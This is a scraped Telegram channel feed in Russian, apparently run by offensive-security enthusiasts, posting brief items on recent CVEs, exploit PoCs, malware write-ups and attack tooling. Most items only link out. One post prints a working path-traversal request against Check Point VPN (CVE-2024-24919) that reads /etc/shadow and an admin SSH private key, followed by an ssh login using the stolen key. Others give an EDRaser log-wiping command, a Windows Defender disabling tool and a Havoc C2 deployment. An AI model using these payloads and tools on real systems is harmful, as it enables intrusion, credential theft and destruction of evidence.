Telegram Group Search
This media is not supported in your browser
VIEW IN TELEGRAM
Образовательные мультики по воскресеньям !
Берем сырники, кофе, смотрим
*
Функции аутентификации в LSASS. Это дает атакующему главный пароль без изменения паролей пользователей.

#мультики #LSASS
CVE-2024-32002 GIT RCE
*
Удаленное выполнение кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit

#git #rce
Интересный и подробный writeUp о том, как юзать уязвимость записи за пределами доступа в FortiGate SSL VPN.
*
Link
Отличный WriteUpt по теме SIM Hijacking
*
Link

#sim
CVE-2024-21683
Confluence Data Center and Server RCE
*
POC - 3 вариата

#Jirka
Поиск, анализ и использование переполнения буфера стека в подсистеме netfilter из контекста softirq.
*
Часть 01
Часть 02

#netfilter #linux
Интересный способ отключить Windows Defender. (через API WSC)
*
NoDefender

#win #defender
Фанатам крэкнутого BurpSuite Pro чутка напрячься
в одной из сборок найдет стиллер

#сыр800
EDRaser
*
Тулза для удаленного удаления:
журналов доступа
журналов событий Windows
баз данных
других файлов на удаленных компьютерах.
два режима работы: автоматический и ручной.
*
link
*
Например
python edraser.py --attack windows_event_log --ip 192.168.1.133
Трансмутация вредоносного ПО - Раскрытие скрытых следов кровавой алхимии.
*
Интересный writeup.
Рассматривается анализ вредоносного ПО под названием «BloodAlchemy», которое наблюдали в ходе атаки.
В октябре 2023 года BloodAlchemy была названа Elastic Security Lab 1 новым RATником. Однако расследование показало, что BloodAlchemy — это НЕ совершенно новая вредоносная программа, а развитая версия Deed RAT, преемника ShadowPad.
*
Link

#malware #rat
This media is not supported in your browser
VIEW IN TELEGRAM
Образовательные мультики по воскресеньям !
*
Едим сырник, пьем кофе, смотрим мультики
*
Как работает нашумевший бэкдор XZUtils SSHD.
#XZ #мультики
Linux Kernel Teaching. Laboratory
*
Большой и годный сборник лекций и лабораторных работ по ядру Linux. Лекции посвящены теоретическому исследованию ядра Linux.
Лабораторки сделаны в стиле инструкций.
Будет полезно: админам, драйверописателям и руткитоварам
*
Link

#linux #kernel
CVE-2024-2961 - тихоходка
*
Помните месяц назад был кипишь, относительно того что нашли дырку в glibc.
Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает Iconv со своим RCE.
*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine
cve-2024-2961_cnext-exploits.zip
7.6 KB
CVE-2024-2961 - тихоходка 2
*
Переполнение буфера в glibc's iconv
*
Exploit + POC 👌

#yammy
CVE-2024-27842 + CVE-2023-40404 macOS
*
Сплоит позволяет выполнять код на уровне ядра
*
POC exploit (для CVE-2024-27842)
POC exploit (для CVE-2023-40404)

#macos
RWX_MEMEORY_HUNT_AND_INJECTION_DV
*
OneDrive.exe + API-интерфейс = шелл-код (без выделения новой области памяти RWX)
*
link
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow


#0day #checkpoint
CVE-2024-24919 Check Point Remote Access VPN 0-Day
Ну или так 👌
aCSHELL/../../../../../../../
home/admin/.ssh/id_rsa

*
ssh admin@Хостъ -i id_rsa

#shitPointVPN #0Day
fuck yeah !
*
ansible-havoc
*
Bash cкрипты/ansible для развертывания Havoc на Linode и настройки и SSL
*
download

#C2 #ansible
Доброй ночи.
Написал небольшую книжку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org

#book #linux #hex
2024/06/02 00:42:16
Back to Top
HTML Embed Code: